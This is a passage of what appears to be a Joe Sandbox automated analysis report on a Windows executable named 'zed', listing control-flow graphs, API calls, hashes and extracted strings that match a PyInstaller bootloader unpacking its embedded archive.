                                                                                                                                                                                                                                                • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                                • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                                • Instruction ID: 0d71f18cc7b9d18548ea9153f57dd33671d7f0717c1e6cb581de7ff16d162488
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1D1DA2AA2864A46E710BF21D4613B9E351EF64F98FC0413FDA0DCB695EF3CE5418761

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 693 7ff7e5326964-7ff7e53269d7 call 7ff7e5326698 696 7ff7e53269d9-7ff7e53269e2 call 7ff7e5314ee8 693->696 697 7ff7e53269f1-7ff7e53269fb call 7ff7e5318520 693->697 704 7ff7e53269e5-7ff7e53269ec call 7ff7e5314f08 696->704 702 7ff7e53269fd-7ff7e5326a14 call 7ff7e5314ee8 call 7ff7e5314f08 697->702 703 7ff7e5326a16-7ff7e5326a7f CreateFileW 697->703 702->704 707 7ff7e5326afc-7ff7e5326b07 GetFileType 703->707 708 7ff7e5326a81-7ff7e5326a87 703->708 715 7ff7e5326d32-7ff7e5326d52 704->715 710 7ff7e5326b5a-7ff7e5326b61 707->710 711 7ff7e5326b09-7ff7e5326b44 GetLastError call 7ff7e5314e7c CloseHandle 707->711 713 7ff7e5326ac9-7ff7e5326af7 GetLastError call 7ff7e5314e7c 708->713 714 7ff7e5326a89-7ff7e5326a8d 708->714 718 7ff7e5326b69-7ff7e5326b6c 710->718 719 7ff7e5326b63-7ff7e5326b67 710->719 711->704 727 7ff7e5326b4a-7ff7e5326b55 call 7ff7e5314f08 711->727 713->704 714->713 720 7ff7e5326a8f-7ff7e5326ac7 CreateFileW 714->720 725 7ff7e5326b72-7ff7e5326bc7 call 7ff7e5318438 718->725 726 7ff7e5326b6e 718->726 719->725 720->707 720->713 732 7ff7e5326bc9-7ff7e5326bd5 call 7ff7e53268a0 725->732 733 7ff7e5326be6-7ff7e5326c17 call 7ff7e5326418 725->733 726->725 727->704 732->733 738 7ff7e5326bd7 732->738 739 7ff7e5326c19-7ff7e5326c1b 733->739 740 7ff7e5326c1d-7ff7e5326c5f 733->740 741 7ff7e5326bd9-7ff7e5326be1 call 7ff7e531aac0 738->741 739->741 742 7ff7e5326c81-7ff7e5326c8c 740->742 743 7ff7e5326c61-7ff7e5326c65 740->743 741->715 746 7ff7e5326d30 742->746 747 7ff7e5326c92-7ff7e5326c96 742->747 743->742 745 7ff7e5326c67-7ff7e5326c7c 743->745 745->742 746->715 747->746 749 7ff7e5326c9c-7ff7e5326ce1 CloseHandle CreateFileW 747->749 750 7ff7e5326ce3-7ff7e5326d11 GetLastError call 7ff7e5314e7c call 7ff7e5318660 749->750 751 7ff7e5326d16-7ff7e5326d2b 749->751 750->751 751->746
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                                                                                                                                • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                                • Instruction ID: d3e5c19e8c7cb5cf8626ee729bbea86c54309cf30c42cd12edbe5062f9b79030
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FC1D136B28E4A85EB10EF69C4A06AC7761FB59F98F91423ADE1E97794CF38D011C311

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 959 7ff7e5325e7c-7ff7e5325eb1 call 7ff7e5325588 call 7ff7e5325590 call 7ff7e53255f8 966 7ff7e5325eb7-7ff7e5325ec2 call 7ff7e5325598 959->966 967 7ff7e5325fef-7ff7e532605d call 7ff7e531a900 call 7ff7e5321578 959->967 966->967 972 7ff7e5325ec8-7ff7e5325ed3 call 7ff7e53255c8 966->972 978 7ff7e532606b-7ff7e532606e 967->978 979 7ff7e532605f-7ff7e5326066 967->979 972->967 980 7ff7e5325ed9-7ff7e5325efc call 7ff7e531a948 GetTimeZoneInformation 972->980 983 7ff7e5326070 978->983 984 7ff7e53260a5-7ff7e53260b8 call 7ff7e531d5fc 978->984 982 7ff7e53260fb-7ff7e53260fe 979->982 989 7ff7e5325f02-7ff7e5325f23 980->989 990 7ff7e5325fc4-7ff7e5325fee call 7ff7e5325580 call 7ff7e5325570 call 7ff7e5325578 980->990 987 7ff7e5326104-7ff7e532610c call 7ff7e5325c00 982->987 988 7ff7e5326073 982->988 983->988 998 7ff7e53260ba 984->998 999 7ff7e53260c3-7ff7e53260de call 7ff7e5321578 984->999 993 7ff7e5326078-7ff7e53260a4 call 7ff7e531a948 call 7ff7e530c550 987->993 988->993 994 7ff7e5326073 call 7ff7e5325e7c 988->994 995 7ff7e5325f2e-7ff7e5325f35 989->995 996 7ff7e5325f25-7ff7e5325f2b 989->996 994->993 1002 7ff7e5325f37-7ff7e5325f3f 995->1002 1003 7ff7e5325f49 995->1003 996->995 1005 7ff7e53260bc-7ff7e53260c1 call 7ff7e531a948 998->1005 1018 7ff7e53260e0-7ff7e53260e3 999->1018 1019 7ff7e53260e5-7ff7e53260f7 call 7ff7e531a948 999->1019 1002->1003 1008 7ff7e5325f41-7ff7e5325f47 1002->1008 1012 7ff7e5325f4b-7ff7e5325fbf call 7ff7e532a4d0 * 4 call 7ff7e5322b5c call 7ff7e5326114 * 2 1003->1012 1005->983 1008->1012 1012->990 1018->1005 1019->982
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7E5325EAA
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E53255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E532560C
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7E5325EBB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E5325598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E53255AC
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7E5325ECC
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E53255C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E53255DC
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E531A948: RtlFreeHeap.NTDLL(?,?,?,00007FF7E5322D22,?,?,?,00007FF7E5322D5F,?,?,00000000,00007FF7E5323225,?,?,?,00007FF7E5323157), ref: 00007FF7E531A95E
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E531A948: GetLastError.KERNEL32(?,?,?,00007FF7E5322D22,?,?,?,00007FF7E5322D5F,?,?,00000000,00007FF7E5323225,?,?,?,00007FF7E5323157), ref: 00007FF7E531A968
                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7E532610C), ref: 00007FF7E5325EF3
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                                • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                                • Instruction ID: ff4a2f633a04111454bae77a699880cce55eeba325f13555b59cf4f3df2dd9bf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A517426A28A4A86E710FF21D8A1279F350BF68B48FC0413FDA4DC7695DF3CE5408761
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                                • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                                • Instruction ID: 6eaf8263e8ddcb1ef0bf063a00532741096cd9d118fd07fa16d77d83acbdea5d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32F0CD27A2C74986F7609B50B4A8766B350AB54B6CF44033BD96D426D4DF3CE058CB01

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 331 7ff7e5301950-7ff7e530198b call 7ff7e53045c0 334 7ff7e5301991-7ff7e53019d1 call 7ff7e5307f90 331->334 335 7ff7e5301c4e-7ff7e5301c72 call 7ff7e530c550 331->335 340 7ff7e5301c3b-7ff7e5301c3e call 7ff7e531004c 334->340 341 7ff7e53019d7-7ff7e53019e7 call 7ff7e53106d4 334->341 345 7ff7e5301c43-7ff7e5301c4b 340->345 346 7ff7e53019e9-7ff7e5301a03 call 7ff7e5314f08 call 7ff7e5302910 341->346 347 7ff7e5301a08-7ff7e5301a24 call 7ff7e531039c 341->347 345->335 346->340 353 7ff7e5301a26-7ff7e5301a40 call 7ff7e5314f08 call 7ff7e5302910 347->353 354 7ff7e5301a45-7ff7e5301a5a call 7ff7e5314f28 347->354 353->340 360 7ff7e5301a5c-7ff7e5301a76 call 7ff7e5314f08 call 7ff7e5302910 354->360 361 7ff7e5301a7b-7ff7e5301b05 call 7ff7e5301c80 * 2 call 7ff7e53106d4 call 7ff7e5314f44 354->361 360->340 375 7ff7e5301b0a-7ff7e5301b14 361->375 376 7ff7e5301b16-7ff7e5301b30 call 7ff7e5314f08 call 7ff7e5302910 375->376 377 7ff7e5301b35-7ff7e5301b4e call 7ff7e531039c 375->377 376->340 383 7ff7e5301b50-7ff7e5301b6a call 7ff7e5314f08 call 7ff7e5302910 377->383 384 7ff7e5301b6f-7ff7e5301b8b call 7ff7e5310110 377->384 383->340 390 7ff7e5301b9e-7ff7e5301bac 384->390 391 7ff7e5301b8d-7ff7e5301b99 call 7ff7e5302710 384->391 390->340 394 7ff7e5301bb2-7ff7e5301bb9 390->394 391->340 397 7ff7e5301bc1-7ff7e5301bc7 394->397 398 7ff7e5301be0-7ff7e5301bef 397->398 399 7ff7e5301bc9-7ff7e5301bd6 397->399 398->398 400 7ff7e5301bf1-7ff7e5301bfa 398->400 399->400 401 7ff7e5301c0f 400->401 402 7ff7e5301bfc-7ff7e5301bff 400->402 403 7ff7e5301c11-7ff7e5301c24 401->403 402->401 404 7ff7e5301c01-7ff7e5301c04 402->404 405 7ff7e5301c26 403->405 406 7ff7e5301c2d-7ff7e5301c39 403->406 404->401 407 7ff7e5301c06-7ff7e5301c09 404->407 405->406 406->340 406->397 407->401 408 7ff7e5301c0b-7ff7e5301c0d 407->408 408->403
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E5307F90: _fread_nolock.LIBCMT ref: 00007FF7E530803A
                                                                                                                                                                                                                                                • _fread_nolock.LIBCMT ref: 00007FF7E5301A1B
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E5302910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7E5301B6A), ref: 00007FF7E530295E
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                • Opcode ID: 4d37377fcd544e5bc457dd1f94d5fe39e21ec1f5484c8870d358832dbde1365c
                                                                                                                                                                                                                                                • Instruction ID: cee225c46994e7b606356e94b7f49b9076e170bf9af1079447557539927062f6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d37377fcd544e5bc457dd1f94d5fe39e21ec1f5484c8870d358832dbde1365c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64818771A2878A86E720FB24D4603B9A391AF64F4CFC4443BD94DC7786DE3CE5458762

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 409 7ff7e5301600-7ff7e5301611 410 7ff7e5301613-7ff7e530161c call 7ff7e5301050 409->410 411 7ff7e5301637-7ff7e5301651 call 7ff7e53045c0 409->411 418 7ff7e530162e-7ff7e5301636 410->418 419 7ff7e530161e-7ff7e5301629 call 7ff7e5302710 410->419 416 7ff7e5301653-7ff7e5301681 call 7ff7e5314f08 call 7ff7e5302910 411->416 417 7ff7e5301682-7ff7e530169c call 7ff7e53045c0 411->417 426 7ff7e530169e-7ff7e53016b3 call 7ff7e5302710 417->426 427 7ff7e53016b8-7ff7e53016cf call 7ff7e53106d4 417->427 419->418 435 7ff7e5301821-7ff7e5301824 call 7ff7e531004c 426->435 433 7ff7e53016d1-7ff7e53016f4 call 7ff7e5314f08 call 7ff7e5302910 427->433 434 7ff7e53016f9-7ff7e53016fd 427->434 448 7ff7e5301819-7ff7e530181c call 7ff7e531004c 433->448 437 7ff7e53016ff-7ff7e530170b call 7ff7e5301210 434->437 438 7ff7e5301717-7ff7e5301737 call 7ff7e5314f44 434->438 443 7ff7e5301829-7ff7e530183b 435->443 445 7ff7e5301710-7ff7e5301712 437->445 449 7ff7e5301761-7ff7e530176c 438->449 450 7ff7e5301739-7ff7e530175c call 7ff7e5314f08 call 7ff7e5302910 438->450 445->448 448->435 451 7ff7e5301802-7ff7e530180a call 7ff7e5314f30 449->451 452 7ff7e5301772-7ff7e5301777 449->452 463 7ff7e530180f-7ff7e5301814 450->463 451->463 455 7ff7e5301780-7ff7e53017a2 call 7ff7e531039c 452->455 464 7ff7e53017a4-7ff7e53017bc call 7ff7e5310adc 455->464 465 7ff7e53017da-7ff7e53017e6 call 7ff7e5314f08 455->465 463->448 471 7ff7e53017c5-7ff7e53017d8 call 7ff7e5314f08 464->471 472 7ff7e53017be-7ff7e53017c1 464->472 470 7ff7e53017ed-7ff7e53017f8 call 7ff7e5302910 465->470 477 7ff7e53017fd 470->477 471->470 472->455 474 7ff7e53017c3 472->474 474->477 477->451
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                • Opcode ID: e32c62f6317018de790b7a824d362476fee4f00d456471d65ae47693b1d932f0
                                                                                                                                                                                                                                                • Instruction ID: cf9a6662ec6a60e1206c8d69eac7229c7cd3daef8c5981b99e50270e668f84e7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e32c62f6317018de790b7a824d362476fee4f00d456471d65ae47693b1d932f0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01519325A28B4E82EA10BB2598303B5A350BF64F9CFC4453BED0CC7796DE3CE5458322

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(?,?,00000000,00007FF7E5303CBB), ref: 00007FF7E5308704
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00007FF7E5303CBB), ref: 00007FF7E530870A
                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00007FF7E5303CBB), ref: 00007FF7E530874C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E5308830: GetEnvironmentVariableW.KERNEL32(00007FF7E530388E), ref: 00007FF7E5308867
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E5308830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7E5308889
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E5318238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E5318251
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E5302810: MessageBoxW.USER32 ref: 00007FF7E53028EA
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                                • Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                                • Instruction ID: 5e25ff97e165c4de9438b2f1c1e9af5cdad798b27a0677db9979377fbb4bf0da
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F41A011A39B4A40EA11B72195713B9D290AF64F8CFC0003BED0DC7B9AEE7CE402C722

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 756 7ff7e5301210-7ff7e530126d call 7ff7e530bd80 759 7ff7e530126f-7ff7e5301296 call 7ff7e5302710 756->759 760 7ff7e5301297-7ff7e53012af call 7ff7e5314f44 756->760 765 7ff7e53012d4-7ff7e53012e4 call 7ff7e5314f44 760->765 766 7ff7e53012b1-7ff7e53012cf call 7ff7e5314f08 call 7ff7e5302910 760->766 772 7ff7e53012e6-7ff7e5301304 call 7ff7e5314f08 call 7ff7e5302910 765->772 773 7ff7e5301309-7ff7e530131b 765->773 777 7ff7e5301439-7ff7e530144e call 7ff7e530ba60 call 7ff7e5314f30 * 2 766->777 772->777 776 7ff7e5301320-7ff7e5301345 call 7ff7e531039c 773->776 784 7ff7e5301431 776->784 785 7ff7e530134b-7ff7e5301355 call 7ff7e5310110 776->785 793 7ff7e5301453-7ff7e530146d 777->793 784->777 785->784 792 7ff7e530135b-7ff7e5301367 785->792 794 7ff7e5301370-7ff7e5301398 call 7ff7e530a1c0 792->794 797 7ff7e5301416-7ff7e530142c call 7ff7e5302710 794->797 798 7ff7e530139a-7ff7e530139d 794->798 797->784 799 7ff7e5301411 798->799 800 7ff7e530139f-7ff7e53013a9 798->800 799->797 802 7ff7e53013d4-7ff7e53013d7 800->802 803 7ff7e53013ab-7ff7e53013b9 call 7ff7e5310adc 800->803 804 7ff7e53013ea-7ff7e53013ef 802->804 805 7ff7e53013d9-7ff7e53013e7 call 7ff7e5329e30 802->805 809 7ff7e53013be-7ff7e53013c1 803->809 804->794 808 7ff7e53013f5-7ff7e53013f8 804->808 805->804 811 7ff7e530140c-7ff7e530140f 808->811 812 7ff7e53013fa-7ff7e53013fd 808->812 813 7ff7e53013c3-7ff7e53013cd call 7ff7e5310110 809->813 814 7ff7e53013cf-7ff7e53013d2 809->814 811->784 812->797 815 7ff7e53013ff-7ff7e5301407 812->815 813->804 813->814 814->797 815->776
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                • Opcode ID: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
                                                                                                                                                                                                                                                • Instruction ID: 23fcbe05ffef57cb7a8d68266a62de0783892069cd4e701efb806e5c877e0eea
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C51C522A2874A41E660BB15E8703BAA291BF64F9CFC4413AED4DC77D6EE3CD541C721

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00007FF7E5303804), ref: 00007FF7E53036E1
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7E5303804), ref: 00007FF7E53036EB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E5302C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E5303706,?,00007FF7E5303804), ref: 00007FF7E5302C9E
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E5302C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E5303706,?,00007FF7E5303804), ref: 00007FF7E5302D63
